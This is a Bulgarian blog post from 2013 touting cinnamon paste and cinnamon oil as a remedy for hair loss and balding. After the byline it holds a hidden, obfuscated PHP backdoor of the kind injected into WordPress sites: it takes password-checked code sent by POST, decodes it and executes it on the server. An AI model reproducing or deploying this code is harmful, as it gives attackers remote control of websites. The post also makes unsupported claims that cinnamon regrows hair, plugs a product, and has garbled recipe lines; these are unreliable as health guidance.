Рецепта с канела срещу косопад и оплешивяване | Косопад

Рецепта с канела срещу косопад и оплешивяване

Канелата притежава много свойства, които могат да са полезни за косата. Може да се използва като евтино домашно средство срещу оплешивяване и косопад, също като природно средство за изсветляване на косата, без химикали.

канела

КАЧЕСТВА

Маслото от канела предпазва от чупене на косата и намалява количеството на падащите косми. Когато се поставя отстрани, на темето или на врата, може да предизвика поникването на коса.

Също така, канелата може да направи косата ви по- светла. Това се постига като спите през нощта със съответната смес.

ЗА ПО- ДОБРИ РЕЗУЛТАТИ

Чрез тази терапия постигате по- добри резултати, когато я поддържате редовно за определен период от време. Човек, който търси бързо решение за косопада или оплешивяването, може да се довери на „Ефект- 2“, тъй като в този случай канелата няма да ви задоволи. Освен това, канелата се използва само за проблемните зони.

Косата, която е суха и гъста, по естествен начин, чрез канелата, може да предотврати чупенето на косата. Тези, които имат по- тънка коса, ще ускорят растежа й.

Тази терапия може да полезна за хора с третирана или нетретирана коса, тъй като служи като защита срещу козметичните продукти.

ТЕРАПИЯ С КАНЕЛА

За да направите паста от канела, която се използва за спиране на косопада, трябва да смесите 1 лъжичка канела и 1 лъжицаканела1 мед в горещ зехтин. После оставяте сместа да престои на кожата на главата за 15 минути преди да го измиете.

 

ТЕРАПИЯ С МАСЛО ОТ КАНЕЛА

Може да го смесите с други съставки, за да има по- добър ефект. Маслото може да се купи или да се направи у дома.

Нанесете маслото преди да измиете косата си. Намажете кожата на главата и после оставете да престои 15 минути. После измивате.

ЗАБЕЛЕЖКА

Маслото от олио може да предизвика мравучкане по скалпа. Не е подходящо за деца, както и за хора с чувствителна кожа на главата.

28. ноември 2013 14:06:42 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}